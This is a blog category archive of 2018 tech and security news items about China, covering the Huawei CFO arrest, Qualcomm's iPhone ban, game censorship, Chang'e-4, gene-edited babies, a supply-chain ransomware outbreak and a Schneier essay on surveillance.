Category Archives: china

Qualcomm Asks China To Ban the iPhone XS and XR

After securing a win in court earlier this week to ban Apple's older phones, Qualcomm is trying to get the newer iPhones banned too. "According to the Financial Times, Qualcomm has now asked Chinese courts to issue an injunction that bans Apple from selling the iPhone XS, XS Max, and XR within the country due to the same case of possible patent infringement," reports The Verge. From the report: The new filing will escalate the companies' legal conflict in China, where Apple has so far ignored a court-ordered sales ban. Apple claims the ban only applied to phones running iOS 11 and earlier. Since its phones have now been updated to iOS 12, Apple believes they can remain on sale, and so it has continued to sell them. According to the Financial Times, the Chinese court's order doesn't specifically mention any version of Apple's operating system. That doesn't necessarily mean Apple is wrong, but it does mean that there's more to be hashed out.

Read more of this story at Slashdot.

President Trump To Use Huawei CFO As a Bargaining Chip

hackingbear shares a report from Politico, adding: "This fuels the suspicion that the Chinese executive is held as a hostage for the ongoing trade negotiation with China." From the report: President Donald Trump said on Tuesday that he reserved the right to weigh in on the Justice Department's case against the CFO of Huawei, if it would help him close a trade deal with Beijing or would serve other American national security interests. "If I think it's good for what will be certainly the largest trade deal ever made -- which is a very important thing -- what's good for national security -- I would certainly intervene if I thought it was necessary," Trump told Reuters. Trump added that President Xi Jinping of China had not called him about the case, but that the White House had been in touch with both the Justice Department and Chinese officials. Huawei's CFO, Meng Wanzhou, was arrested in Canada earlier this month at the request of American authorities, who allege that she violated U.S. sanctions against Iran. Yesterday, a Vancouver judge ruled that Meng would be released on a $7.5 million bail if she remains in British Columbia.

Read more of this story at Slashdot.

Episode 124: The Twitter Accounts Pushing French Protests. Also: social engineering the Software Supply Chain

In this week’s podcast (#124):  we speak with French security researcher Baptiste Robert about research on the social media accounts pushing the french "Yellow Vest" protests. Surprise, surprise: they're not french. Also: Brian Fox of the firm Sonatype joins us to talk about the recent compromise of the Github event-stream project and why...

Read the whole entry... »

Related Stories

Is 2019 Privacy Rights’ Break Out Year?

Whatever else it may bring, 2019 will be a breakout year for online privacy, as the EU’s GDPR takes root and legislation in other nations follow suit. But not everyone is on board with the new privacy regime. Who will be the privacy leaders and laggards in the New Year?

The post Is 2019 Privacy Rights’ Break Out Year? appeared first on ...

Read the whole entry... »

Related Stories

China To Force Changes To 20 Popular Games, Ban 9 Including Fortnite and PUBG

An anonymous reader quotes a report from the BBC: A panel of censors set up to vet mobile video games in China has signaled it will be hard to please. State media reports that of the first 20 titles it assessed, nine were refused permission to go on sale. The Xinhua news agency added that developers of the other 11 had been told they had to make adjustments to remove "controversial content." The authorities have voiced concerns about the violent nature of some titles as well as worries about the activity being addictive. It was announced in August that a new body -- the State Administration of Press and Publications -- had taken over responsibility for approving games and that it would limit the number of online titles available. And although it has not been specified, some experts are assuming that the new panel will operate under its auspices. Xinhua said it is comprised of gaming experts, government-employed researchers, and representatives from the media and video games industry. But it provided no other information about who they were or the titles they had already examined. UPDATE: The list of games being examined by the ethics panel has been revealed by users on NGA, a Chinese gaming forum. A number of games, such as League of Legends, Overwatch, Diablo, and World of Warcraft, will need "corrective action," while others will be "banned/withdrawn" entirely. Some of the most popular prohibited titles include Fortnite and PlayerUnknown's Battlegrounds (PUBG).

Read more of this story at Slashdot.

China Forms New Body To Review Ethics Risks of Video Games

China has established a new body that reviews ethical issues in video gaming, marking the country's latest attempt to tighten control over the world's biggest games market. From a report: The recently formed Online Games Ethics Committee has so far evaluated an initial batch of 20 video game titles, according to a report on Friday from state broadcaster China Central Television (CCTV). This was the first time the committee's existence was made public. Without elaborating, the CCTV report said the ethics committee rejected nine games for publication in the domestic market, while ruling that certain content be modified in the 11 other games that were reviewed. The report neither revealed which government department the ethics committee was directly under nor identified the 20 games that the body processed. The creation of the Online Games Ethics Committee has come amid concerns over internet addiction, childhood myopia and unsuitable content in China's US$38 billion video games market, which has led Beijing to tighten its control over the industry and freeze the approval of new titles this year.

Read more of this story at Slashdot.

Can the US Stop China From Controlling the Next Internet Age?

Tech executives worry China will turn to tit-for-tat arrests of Americans in response to the detention of Meng Wanzhou. And the worries don't stop there. Kara Swisher, writing at The New York Times: Imagine, if you will (and you should), a big American tech executive being detained over unspecified charges while on a trip to Beijing. That is exactly what a number of Silicon Valley executives told me they are concerned about after the arrest this week of Meng Wanzhou, the chief financial officer of the Chinese telecom company Huawei, in Canada at the behest of United States officials. "It's worrisome, because it's an escalation we did not need," one executive said, referring to the already tense trade talks between the two countries. "What China will do, given all the existing tensions, is anyone's guess." No one I spoke to would talk on the record, out of fear of antagonizing either side and also because no one knows exactly what is happening. But many expressed worry about the possibility of tit-for-tat arrests. While everyone focuses on the drama of the arrest -- Ms. Meng was grabbed while changing planes at the airport -- and its effect on the trade talks and stock prices, to my mind there is a much more important fight brewing, and it is about tech hegemony. Specifically, who will control the next internet age, and by whose rules will it be run? Until recently, that answer was clearly the United States, from which the Internet sprang, wiring the world together and, in the process, resulting in the greatest creation of power and wealth in history. While China has always had a strong technology sector, in recent years it has significantly escalated its investment, expertise and innovation, with major support from the government. That hand-in-glove relationship creates obvious issues, and the Trump administration is right to stop pretending that China does not present a threat both from security and innovation perspectives. Further reading: China summons U.S. ambassador, warns Canada of 'grave consequences' if Huawei executive Meng Wanzhou is not released.

Read more of this story at Slashdot.

China’s Chang’e-4 Launches On Mission To the Moon’s Far Side

An anonymous reader quotes a report from The New York Times: China is aiming to go where no one has gone before: the far side of the moon. A rocket carrying the Chang'e-4 lunar lander blasted off at about 2:23 a.m. local time on Saturday from Xichang Satellite Launch Center in southern China. (In the United States, it was still midday Friday). Chinese authorities did not broadcast the launch, but an unofficial live stream recorded near the site showed the rocket rise from the launch pad until its flames looked like a bright star in the area's dark skies. Nearly one hour later, Xinhua, China's state-run news agency reported that Chang'e-4 had successfully launched. Exactly when it will set down at its destination has not yet been announced -- possibly in early January -- but Chang'e-4 will provide the first close-up look at a part of the moon that is eternally out of view from Earth. The rover will attempt to land in the 110-mile-wide Von Karman crater. The crater is within an area known as the South Pole-Aitken basin, a gigantic, 1,600-mile wide crater at the bottom of the moon, which has a mineralogy distinct from other locations. "That may reflect materials from the inside of the moon that were brought up by the impact that created the basin," reports The New York Times. The suite of instruments on the rover and the lander -- cameras, ground-penetrating radar and spectrometers -- "will probe the structure of the rocks beneath the spacecraft, study the effects of the solar wind striking the lunar surface," the report says. "Chang'e-4 will also test the ability of making radio astronomy observations from the far side of the moon, without the effects of noise and interference from Earth." It will also see if plant seeds will germinate and silkworm eggs will hatch in the moon's low gravity.

Read more of this story at Slashdot.

Chinese Mobile App Companies Are a National Security Risk, Says a Top Democrat

Chinese mobile app companies pose the same national security risk to the US as telecom giants like Huawei and ZTE, Sen. Mark Warner said in an interview. From a report: Recent US legislation largely banned Huawei and ZTE from use by the government and its contractors, due to concerns about surveillance and other national security risks. Now Warner, the top Democrat on the Senate Intelligence Committee, is signaling that Chinese app developers may face similar scrutiny from lawmakers, corporate America, and the intelligence community. Warner's comments follow a recent BuzzFeed News report that popular apps from China's Cheetah Mobile and Kika Tech were exploiting user permissions to engage in a form of ad fraud. Eight Android apps with more than 2 billion total downloads were said to be engaging in a form of app-install ad fraud. Google subsequently removed two of the apps from the Play store and said it continues to investigate. Cheetah and Kika deny engaging in app-install fraud. "Under Chinese law, all Chinese companies are ultimately beholden to the Communist Party, not their board or shareholders, so any Chinese technology company -- whether in telecom or mobile apps -- should be seen as extensions of the state and a national security risk," Warner said in an interview this week with BuzzFeed News. Further reading: Sen. Warner calls for US cyber doctrine, new standards for security.

Read more of this story at Slashdot.

Trade war tensions with China rise following arrest of Huawei CFO in Canada

Wanzhou Meng, Huawei’s CFO and the daughter of the company’s founder, was arrested at the Vancouver airport on Dec. 1 and is awaiting extradition to the US to face trial on accusations that the US export sanctions against Iran were breached, writes the Globe and Mail. Her bail hearing is on Dec. 7.

Further details were not provided due to Meng’s request for a publication ban.

“She is sought for extradition by the United States, and a bail hearing has been set for Friday,” Justice Department spokesman Ian McLeod said in a statement to the Toronto-based newspaper on Wednesday. “As there is a publication ban in effect, we cannot provide any further detail at this time. The ban was sought by Ms. Meng.”

The US government released several warnings advising consumers to not purchase Huawei smartphones as it considers them a threat to national security. In April it was announced that the company was already under investigation for illegal sales violating US sanctions against Iran, following similar allegations against Chinese company ZTE. The use of Huawei devices has been banned in the US government, which has also sought to persuade other countries to ban the Chinese manufacturer.

“After the Trump Administration imposed a ban on the sale of American technologies to ZTE last week for similar export violations, this latest development feels like deja vu all over again and could cast a serious shadow over the business of the $92.5 billion Chinese company,” wrote Forbes at the time.

In 2016, the US government issued a subpoena to investigate Huawei’s export of US technology over the previous five years to advocates of international terrorism or nations under US trade sanctions and economic embargo such as North Korea, Iran, Cuba, Sudan and Syria.

Regarding Meng’s arrest, Canadian Prime Minister Justin Trudeau said the Canadian government is not involved, and the arrest happening following an extradition request from the US government.

Calling it a human rights violation, the Chinese embassy in Ottawa demanded her immediate release because she did not break the laws of the US and Canada.

“The detention without giving any reason violates a person’s human rights,” responded a Chinese foreign ministry spokesperson. “We have made solemn representations to Canada and the US, demanding that both parties immediately clarify the reasons for the detention, and immediately release the detainee to protect the person’s legal rights.”

Source: Twitter

According to Reuters, Meng has been associated with Skycom Tech and a 2010 deal, which was not finalized, to sell HP equipment to Iran with the approval of Huawei. This may or may not have a connection with the charges brought against her now, details have not been released.

China Calls For Release of Arrested Huawei CFO Detained In Canada

China is demanding the release of a senior executive at Huawei after she was detained in Canada on extradition charges to the U.S. Wanzhou Meng, who is also the deputy chair of Huawei's board and the daughter of company founder Ren Zhengfei, is suspected of violating U.S. trade sanctions against Iran. NBC News reports: The arrest of Meng Wanzhou, chief financial officer and daughter of the company's founder Ren Zhengfei, spooked investors with U.S. stocks tumbling on fears of a flare-up in Chinese-U.S. tensions. She was arrested in Vancouver, British Columbia, on Dec. 1. China's Ministry of Foreign Affairs said officials have been contacted both in the U.S. and Canada to demand Meng's release. Geng Shuang, a spokesman for the ministry, said her detention needed to be explained, and both countries had to "effectively protect the legitimate rights and interests of the person concerned." A spokesperson for Huawei said in a statement that it "complies with all applicable laws and regulations where it operates, including applicable export control and sanction laws and regulations."

Read more of this story at Slashdot.

Hackers Behind Breach at Hotel Group Marriott Left Clues Suggesting They Were Working For Chinese Government Intelligence Gathering Operation, Report Says

Marriott said last week that a hack that began four years ago had exposed the records of up to 500 million customers in its Starwood hotels reservation system. Private investigators looking into the breach have found hacking tools, techniques and procedures previously used in attacks attributed to Chinese hackers, Reuters reported, citing three sources who were not authorized to discuss the company's private probe into the attack. From the report: That suggests that Chinese hackers may have been behind a campaign designed to collect information for use in Beijing's espionage efforts and not for financial gain, two of the sources said. While China has emerged as the lead suspect in the case, the sources cautioned it was possible somebody else was behind the hack because other parties had access to the same hacking tools, some of which have previously been posted online.

Read more of this story at Slashdot.

More Than 100,000 PCs in China Infected by New Ransomware Strain

A new ransomware strain successfully infected more than 100,000 personal computers in China over a period of just four days. According to a report from Velvet Security, the first samples of this ransomware broke out on 1 December after users installed multiple social media-themed apps including “Account Operation V3.1,” an app designed to help users […]… Read More

The post More Than 100,000 PCs in China Infected by New Ransomware Strain appeared first on The State of Security.

New strain of Ransomware infected over 100,000 PCs in China

Security experts reported a new strain of malware spreading in China, the malicious code rapidly infected over 100,000 PCs in just four days.

Unfortunately, the number of infections is rapidly increasing because hackers compromised a supply chain.

It is interesting to note that this ransomware requests victims to pay 110 yuan (nearly Euro 14) in ransom through WeChat Pay.

“On December 1, the first ransomware that demanded the “WeChat payment” ransom broke out in the country. According to the monitoring and evaluation of the “Colvet Threat Intelligence System”, as of the evening of the 4th, the virus infected at least 100,000 computers, not only locked the computer.” reads the analysis published by anti-virus firm Velvet Security

“The document also steals information on tens of thousands of user passwords on platforms such as Taobao and Alipay.” 

Victims are prompted to pay the ransomware to attackers’ WeChat account within 3 days to receive the decryption key. If the victim doesn’t pay the ransomware within a specific time, the malicious code will delete the decryption key from the C&C server.

The malicious code also implements password stealing abilities, the ransomware is able to steal users’ credential for popular Chinese services, including Alipay, NetEase 163 email service, Baidu Cloud Disk, Jingdong (, Taobao, Tmall , AliWangWang, and QQ websites.

The ransomware also collects information on the infected system, including CPU model, screen resolution, network information and list of installed software.

According to experts from Velvet Security, hackers compromised the supply chain of the “EasyLanguage” programming software used by a large number of application developers.

The tainted software is used by hackers to inject the malicious code into every software compiled through the programming software.

To avoid detection, author of the threat signed the code with a trusted digital certificate issued form from Tencent Technologies and avoid encrypting data in some specific directories, like “Tencent Games, League of Legends, tmp, rtl, and program.

The good news for the victims is that researchers were able to crack the ransomware; the experts discovered that the malware uses XOR cipher, instead of DES, to encrypt the file, it also stores a copy of the decryption key locally on the victim’s system in the following path:


Velvet experts released d a free ransomware decryption tool that could be used to decrypt documents encrypted by the malware.

Experts attributed the ransomware to a software programmer named “Luo,” they reported their discovery to the Chinese authorities.

ransomware author

Pierluigi Paganini

(Security Affairs – cybercrime, China)

The post New strain of Ransomware infected over 100,000 PCs in China appeared first on Security Affairs.

China Announces Punishments For Intellectual-Property Theft

China has announced an array of punishments that could restrict companies' access to borrowing and state-funding support over intellectual-property theft. The news comes after the G20 Summit in Argentina, where the Trump Administration agreed to hold off on tariff action for at least 90 days as they negotiate to resolve specific U.S. complaints. Bloomberg reports: China set out a total of 38 different punishments to be applied to IP violations, starting this month. The document, dated Nov. 21, was released Tuesday by the National Development and Reform Commission and signed by various government bodies, including the central bank and supreme court. China says violators would be banned from issuing bonds or other financing tools, and participating in government procurement. They would also be restricted from accessing government financial support, foreign trade, registering companies, auctioning land or trading properties. In addition, violators will be recorded on a list, and financial institutions will refer to that when lending or granting access to foreign exchange. Names will be posted on a government website. "This is an unprecedented regulation on IP violation in terms of the scope of the ministries and severity of the punishment," said Xu Xinming, a researcher at the Center for Intellectual Property Studies at China University of Political Science and Law. The newly announced punishments are "a security net of IP protection" targeting repeat offenders and other individuals who aren't in compliance with the law, he said.

Read more of this story at Slashdot.

China Set To Launch First-Ever Spacecraft to the Far Side of the Moon, Will Attempt To Grow Plant There

AmiMoJo writes: Later this week, China plans to launch its Chang'e-4 spacecraft to the far side of the lunar surface. The aim is to land a rover on the dark side of the moon for the first time. Blocked from direct communication with the Earth, the lander and rover will depend on China's Queqiao communication satellite launched in May. If the landing is successful, the mission's main job will be to investigate this side of the lunar surface, which is peppered with many small craters. The lander will also conduct the first radio astronomy experiments from the far side of the Moon -- and the first investigations to see whether plants will grow in the low-gravity lunar environment. The ultimate goal of the China National Space Administration (CNSA) is to create a Moon base for future human exploration there, although it has not announced when that might happen. Chang'e-4 will be the country's second craft to 'soft' land on the lunar surface, following Chang'e-3's touchdown in 2013.

Read more of this story at Slashdot.

Steam is Finally Coming To China But Chinese Gamers Don’t Want It

Valve officially announced this week the arrival of Steam China in Shanghai. But Chinese gamers are telling the PC gaming platform to "get lost!" From a report: One of the most upvoted comments wrote, "Steam China get out of China." It's important to point out that gamers are directing their anger at Steam China, not Steam. In fact, Chinese gamers love Steam... the global version of it, anyway. There are an estimated 30 million Chinese users playing games on the platform -- games which otherwise aren't officially available in China. But that's exactly why they fear the launch of Steam China, which is a joint venture between Valve and Chinese company Perfect World. Gamers worry that not only will Steam China be a heavily censored platform with a much smaller lineup of titles; worse yet, it might also be the trigger for the government to ban the global version of Steam.

Read more of this story at Slashdot.

Automakers Give the Chinese Government Access To Location Data of Electric Cars

According to a new report from The Associated Press, a number of China's government officials and entities have had access to the location data of "new energy vehicles" from many different manufacturers. "More than 200 manufacturers (both national and foreign) transmit the data to 'government-backed monitoring centers,' according to the report, including one called 'The Shanghai Electric Vehicle Public Data Collecting, Monitoring and Research Center' and another known as the 'National Big Data Alliance of New Energy Vehicles,'" reports The Verge. From the report: Chinese officials told the AP that this data -- which includes the real-time location of cars, plus "dozens of other data points" -- is collected to "improve public safety" and "facilitate industrial development and infrastructure planning." The officials say the data is also used to "prevent fraud" in the government's subsidy program for new energy vehicles, which offers steep discounts on clean cars. The monitoring systems have been in place since the beginning of 2017, according to a report by the International Council on Clean Transportation from last year. Staffers at the data monitoring centers are able to look at a map, click on a car, and see things like make and model, mileage, and battery charge, according to the AP report.

Read more of this story at Slashdot.

Apple Reportedly Cuts Over 700 Apps from Chinese App Store

Apple has reportedly removed 718 apps from the Chinese App Store in the last few days. From a report: The iPhone maker swept out the apps because their developers pushed updates without its permission, The Telegraph reported, citing local reports. Apple warned developers against updating iOS apps without its permission in early 2017. The banned apps included Sogou's search engine and maps, online retailer Pinduodo and car sharing service Togo Car.

Read more of this story at Slashdot.

In China, Your Car Could Be Talking To the Government

schwit1 shares a report: More than 200 manufacturers, including Tesla, Volkswagen, BMW, Daimler, Ford, General Motors, Nissan, Mitsubishi and U.S.-listed electric vehicle start-up NIO, transmit position information and dozens of other data points to government-backed monitoring centers, The Associated Press has found. Generally, it happens without car owners' knowledge. The automakers say they are merely complying with local laws, which apply only to alternative energy vehicles. Chinese officials say the data is used for analytics to improve public safety, facilitate industrial development and infrastructure planning, and to prevent fraud in subsidy programs. But other countries that are major markets for electronic vehicles -- the United States, Japan, across Europe -- do not collect this kind of real-time data. And critics say the information collected in China is beyond what is needed to meet the country's stated goals. It could be used not only to undermine foreign carmakers' competitive position, but also for surveillance -- particularly in China, where there are few protections on personal privacy. Under the leadership of Xi Jinping, China has unleashed a war on dissent, marshalling big data and artificial intelligence to create a more perfect kind of policing, capable of predicting and eliminating perceived threats to the stability of the ruling Communist Party.

Read more of this story at Slashdot.

That Bloomberg Supply-Chain-Hack Story

Back in October, Bloomberg reported that China has managed to install backdoors into server equipment that ended up in networks belonging to -- among others -- Apple and Amazon. Pretty much everybody has denied it (including the US DHS and the UK NCSC). Bloomberg has stood by its story -- and is still standing by it.

I don't think it's real. Yes, it's plausible. But first of all, if someone actually surreptitiously put malicious chips onto motherboards en masse, we would have seen a photo of the alleged chip already. And second, there are easier, more effective, and less obvious ways of adding backdoors to networking equipment.

China Halts Work by Team on Gene-Edited Babies

China's government ordered a halt Thursday to work by a medical team that claimed to have helped make the world's first gene-edited babies, as a group of leading scientists declared that it's still too soon to try to make permanent changes to DNA that can be inherited by future generations. AP reports: Chinese Vice Minister of Science and Technology Xu Nanping told state broadcaster CCTV that his ministry is strongly opposed to the efforts that reportedly produced twin girls born earlier this month. Xu called the team's actions illegal and unacceptable and said an investigation had been ordered, but made no mention of specific actions taken. Researcher He Jiankui claims to have altered the DNA of the twins to try to make them resistant to infection with the AIDS virus. Mainstream scientists have condemned the experiment, and universities and government groups are investigating. His experiment "crossed the line of morality and ethics adhered to by the academic community and was shocking and unacceptable," Xu said. A group of leading scientists gathered in Hong Kong this week for an international conference on gene editing, the ability to rewrite the code of life to try to correct or prevent diseases.

Read more of this story at Slashdot.

Bloomberg is Still Reporting on Challenged Story Regarding China Hardware Hack

Erik Wemple, writing for The Washington Post: According to informed sources, Bloomberg has continued reporting the blockbuster story that it broke on Oct. 4, including a very recent round of inquiries from a Bloomberg News/Bloomberg Businessweek investigative reporter. In emails to employees at Apple, Bloomberg's Ben Elgin has requested "discreet" input on the alleged hack. "My colleagues' story from last month (Super Micro) has sparked a lot of pushback," Elgin wrote on Nov. 19 to one Apple employee. "I've been asked to join the research effort here to do more digging on this ... and I would value hearing your thoughts (whatever they may be) and guidance, as I get my bearings." One person who spoke with Elgin told the Erik Wemple Blog that the Bloomberg reporter made clear that he wasn't part of the reporting team that produced "The Big Hack." The goal of this effort, Elgin told the potential source, was to get to "ground truth"; if Elgin heard from 10 or so sources that "The Big Hack" was itself a piece of hackery, he would send that message up his chain of command. The potential source told Elgin that the denials of "The Big Hack" were "100 percent right." According to the potential source, Elgin also asked about the possibility that Peter Ziatek, senior director of information security at Apple, had written a report regarding a hardware hack affecting Apple. In an interview with the Erik Wemple Blog, Ziatek says that he'd never written that report, nor is he aware of such a document. Following the publication of Bloomberg's story, Apple conducted what it calls a "secondary" investigation surrounding its awareness of events along the lines of what was alleged in "The Big Hack." That investigation included a full pat-down of Ziatek's own electronic communications. It found nothing to corroborate the claims in the Bloomberg story, according to Ziatek.

Read more of this story at Slashdot.

China Expands Research Funding, Luring US Scientists and Students

An anonymous reader quotes a report from NPR: In the past decade or so, China has been expanding its commitment to scientific research, and it shows. Chinese researchers now produce more scientific publications than U.S. scientists do, and the global ratings of Chinese universities are rising. Five years ago [professor of chemistry at the University of California, San Diego, JaySiegel] became dean of the school of pharmaceutical science and technology at Tianjin University. He says the university president recruited him to build an undergraduate program that would attract students from all over -- not just China. Siegel says the program is taught entirely in English. There's another aspect of getting a pharmaceutical science degree at Tianjin that Siegel expects students from throughout the world to find particularly attractive: The Chinese government plans to offer scholarships to cover the cost for students who enroll. Siegel says this is all part of China's effort to attract international scientists. Of course, there are some drawbacks with working in China. There are internet restrictions, making it difficult to reach certain websites; English isn't spoken throughout most of the country, posing a problem for many foreign visitors; and free speech isn't the same concept as it is in the United States. With that said, "There's no interference politically on the science," says Greg Herczeg, an astronomer at the Kavli Institute for Astronomy and Astrophysics at Peking University. "We've had no political restrictions," says Siegel. "I know that people talk about them being out there, and I've heard rumors of things. But, for us personally, I would have to say no, I've not had that experience."

Read more of this story at Slashdot.

China is Planning To Build a Deep Sea Base For Unmanned Submarine Science and Defense Operations in the South China Sea

Urged by China President Xi Jinping to dare to do something that has never been done before, scientists say challenges could give China huge technology lead. From a report: China is planning to build a deep sea base for unmanned submarine science and defence operations in the South China Sea, a centre that might become the first artificial intelligence colony on Earth, officials and scientists involved in the plan said. The project -- named in part after Hades, the underworld of Greek mythology -- was launched at the Chinese Academy of Sciences in Beijing this month after a visit to a deep sea research institute at Sanya, Hainan province, by Chinese President Xi Jinping in April. Xi urged the scientists and engineers to dare to do something that has never been done before. "There is no road in the deep sea, we do not need to chase [after other countries], we are the road," he said. The idea of an outpost for deep sea exploration has been a favourite of scientists, engineers and fiction writers for hundreds of years, while the Greek allegory of Atlantis has inspired many "city beneath the sea" stories. The Hadal zone that would be home to the base is the deepest part of an ocean -- typically a V-shape abyss -- at a depth of 6,000 to 11,000 metres (19,685 to 36,100 feet). The project will cost Chinese taxpayers 1.1 billion yuan (US$160 million), the scientists said. That is half as much again as the cost of the FAST radio telescope -- the world's largest -- in Guizhou province, southwest China.

Read more of this story at Slashdot.

Popular Android apps on Play Store caught defrauding users

By Waqas

A well-known Chinese app developer Cheetah Mobile and one of its subsidiaries Kika Tech might have claimed credit for millions of dollars from advertisers through an Android fraud scheme, reveals app analytics firm Kochava. It is a common practice for mobile app developers to generate revenue by marketing for new apps inside their apps for […]

This is a post from Read the original post: Popular Android apps on Play Store caught defrauding users

Chinese Scientist Says He’s First To Create Genetically Modified Babies Using CRISPR

For the first time, a scientist claims to have used a powerful new gene-editing technique to create genetically modified human babies. From a report: The scientist, He Jiankui of the Southern University of Science and Technology in Shenzhen, China, says he used human embryos modified with the gene-editing technique CRISPR to create twin girls. "Two beautiful little Chinese girls name Lulu and Nana came crying into the world as healthy as any other babies a few weeks ago." He says in a video posted online. "The babies are home now with their mom Grace and their dad Mark." He says his team performed "gene surgery" on embryos created from their parents' sperm and eggs to protect the children from the human immunodeficiency virus, HIV, which causes AIDS. The children' father is HIV-positive. "When Lulu and Nana were just a single cell, this surgery removed a doorway through which HIV enter to infect people," He says in the video, one of several posted online to justify and explain the work. Because the research has not yet been published in a scientific journal or carefully vetted by other scientists, many researchers and bioethicists remain cautious about the claim.

Read more of this story at Slashdot.

China’s Cashless Economy Threatens To Leave Its Elderly — and Their Money — Behind

An anonymous reader shares a report: With his cellphone in one hand, and two wooden meditation balls in the other, Zhang Siqi queued up alongside throngs of fellow retirees that make up the morning rush at a small Beijing grocery store. Zhang, a Beijing native, then opened the WeChat mobile pay tab on his phone and scanned it at the automatic register to pay for some fruit and a pack of cigarettes with a savviness that belied his age. That cutting-edge payment method is rapidly becoming so common in Beijing and other large cities that experts have begun referring to the Chinese capital as a prototype of the futuristic cashless society. In 2017, the country saw $15 trillion in mobile payments, the Wall Street Journal reported, far outstripping the US. While Zhang has been using WeChat social media and mobile pay functions for a few years now, the 63-year-old knows not every Chinese senior citizen is equally adept. "Some old people find it difficult to keep up with technology. Many retirees have poor eyesight, and struggle to see the screen, or have a poor memory and keep forgetting how to use the apps," he said, pocketing his phone with his right hand, and rolling the wooden meditation balls with his left. Those issues were brought into sharp focus recently by a viral video of an older Chinese patron in northern China arguing with the staff at the checkout of a supermarket in northern China over how to pay for a bag of grapes -- the staff told him he needed to pay by app, but eventually relented and allowed him to pay by cash. A slew of viewers expressed sympathy for the demoralized customer, including consultant Matthew Brennan, who writes about China's ever-evolving tech scene.

Read more of this story at Slashdot.

How Surveillance Inhibits Freedom of Expression

In my book Data and Goliath, I write about the value of privacy. I talk about how it is essential for political liberty and justice, and for commercial fairness and equality. I talk about how it increases personal freedom and individual autonomy, and how the lack of it makes us all less secure. But this is probably the most important argument as to why society as a whole must protect privacy: it allows society to progress.

We know that surveillance has a chilling effect on freedom. People change their behavior when they live their lives under surveillance. They are less likely to speak freely and act individually. They self-censor. They become conformist. This is obviously true for government surveillance, but is true for corporate surveillance as well. We simply aren't as willing to be our individual selves when others are watching.

Let's take an example: hearing that parents and children are being separated as they cross the US border, you want to learn more. You visit the website of an international immigrants' rights group, a fact that is available to the government through mass Internet surveillance. You sign up for the group's mailing list, another fact that is potentially available to the government. The group then calls or e-mails to invite you to a local meeting. Same. Your license plates can be collected as you drive to the meeting; your face can be scanned and identified as you walk into and out of the meeting. If, instead of visiting the website, you visit the group's Facebook page, Facebook knows that you did and that feeds into its profile of you, available to advertisers and political activists alike. Ditto if you like their page, share a link with your friends, or just post about the issue.

Maybe you are an immigrant yourself, documented or not. Or maybe some of your family is. Or maybe you have friends or coworkers who are. How likely are you to get involved if you know that your interest and concern can be gathered and used by government and corporate actors? What if the issue you are interested in is pro- or anti-gun control, anti-police violence or in support of the police? Does that make a difference?

Maybe the issue doesn't matter, and you would never be afraid to be identified and tracked based on your political or social interests. But even if you are so fearless, you probably know someone who has more to lose, and thus more to fear, from their personal, sexual, or political beliefs being exposed.

This isn't just hypothetical. In the months and years after the 9/11 terrorist attacks, many of us censored what we spoke about on social media or what we searched on the Internet. We know from a 2013 PEN study that writers in the United States self-censored their browsing habits out of fear the government was watching. And this isn't exclusively an American event; Internet self-censorship is prevalent across the globe, China being a prime example.

Ultimately, this fear stagnates society in two ways. The first is that the presence of surveillance means society cannot experiment with new things without fear of reprisal, and that means those experiments­ -- if found to be inoffensive or even essential to society -- ­cannot slowly become commonplace, moral, and then legal. If surveillance nips that process in the bud, change never happens. All social progress­ -- from ending slavery to fighting for women's rights­ -- began as ideas that were, quite literally, dangerous to assert. Yet without the ability to safely develop, discuss, and eventually act on those assertions, our society would not have been able to further its democratic values in the way that it has.

Consider the decades-long fight for gay rights around the world. Within our lifetimes we have made enormous strides to combat homophobia and increase acceptance of queer folks' right to marry. Queer relationships slowly progressed from being viewed as immoral and illegal, to being viewed as somewhat moral and tolerated, to finally being accepted as moral and legal.

In the end, it was the public nature of those activities that eventually slayed the bigoted beast, but the ability to act in private was essential in the beginning for the early experimentation, community building, and organizing.

Marijuana legalization is going through the same process: it's currently sitting between somewhat moral, and­ -- depending on the state or country in question -- ­tolerated and legal. But, again, for this to have happened, someone decades ago had to try pot and realize that it wasn't really harmful, either to themselves or to those around them. Then it had to become a counterculture, and finally a social and political movement. If pervasive surveillance meant that those early pot smokers would have been arrested for doing something illegal, the movement would have been squashed before inception. Of course the story is more complicated than that, but the ability for members of society to privately smoke weed was essential for putting it on the path to legalization.

We don't yet know which subversive ideas and illegal acts of today will become political causes and positive social change tomorrow, but they're around. And they require privacy to germinate. Take away that privacy, and we'll have a much harder time breaking down our inherited moral assumptions.

The second way surveillance hurts our democratic values is that it encourages society to make more things illegal. Consider the things you do­ -- the different things each of us does­ -- that portions of society find immoral. Not just recreational drugs and gay sex, but gambling, dancing, public displays of affection. All of us do things that are deemed immoral by some groups, but are not illegal because they don't harm anyone. But it's important that these things can be done out of the disapproving gaze of those who would otherwise rally against such practices.

If there is no privacy, there will be pressure to change. Some people will recognize that their morality isn't necessarily the morality of everyone­ -- and that that's okay. But others will start demanding legislative change, or using less legal and more violent means, to force others to match their idea of morality.

It's easy to imagine the more conservative (in the small-c sense, not in the sense of the named political party) among us getting enough power to make illegal what they would otherwise be forced to witness. In this way, privacy helps protect the rights of the minority from the tyranny of the majority.

This is how we got Prohibition in the 1920s, and if we had had today's surveillance capabilities in the 1920s, it would have been far more effectively enforced. Recipes for making your own spirits would have been much harder to distribute. Speakeasies would have been impossible to keep secret. The criminal trade in illegal alcohol would also have been more effectively suppressed. There would have been less discussion about the harms of Prohibition, less "what if we didn't?" thinking. Political organizing might have been difficult. In that world, the law might have stuck to this day.

China serves as a cautionary tale. The country has long been a world leader in the ubiquitous surveillance of its citizens, with the goal not of crime prevention but of social control. They are about to further enhance their system, giving every citizen a "social credit" rating. The details are yet unclear, but the general concept is that people will be rated based on their activities, both online and off. Their political comments, their friends and associates, and everything else will be assessed and scored. Those who are conforming, obedient, and apolitical will be given high scores. People without those scores will be denied privileges like access to certain schools and foreign travel. If the program is half as far-reaching as early reports indicate, the subsequent pressure to conform will be enormous. This social surveillance system is precisely the sort of surveillance designed to maintain the status quo.

For social norms to change, people need to deviate from these inherited norms. People need the space to try alternate ways of living without risking arrest or social ostracization. People need to be able to read critiques of those norms without anyone's knowledge, discuss them without their opinions being recorded, and write about their experiences without their names attached to their words. People need to be able to do things that others find distasteful, or even immoral. The minority needs protection from the tyranny of the majority.

Privacy makes all of this possible. Privacy encourages social progress by giving the few room to experiment free from the watchful eye of the many. Even if you are not personally chilled by ubiquitous surveillance, the society you live in is, and the personal costs are unequivocal.

This essay originally appeared in McSweeney's issue #54: "The End of Trust." It was reprinted on

What’s the Next Big Thing in Tech? It’s Up To Us

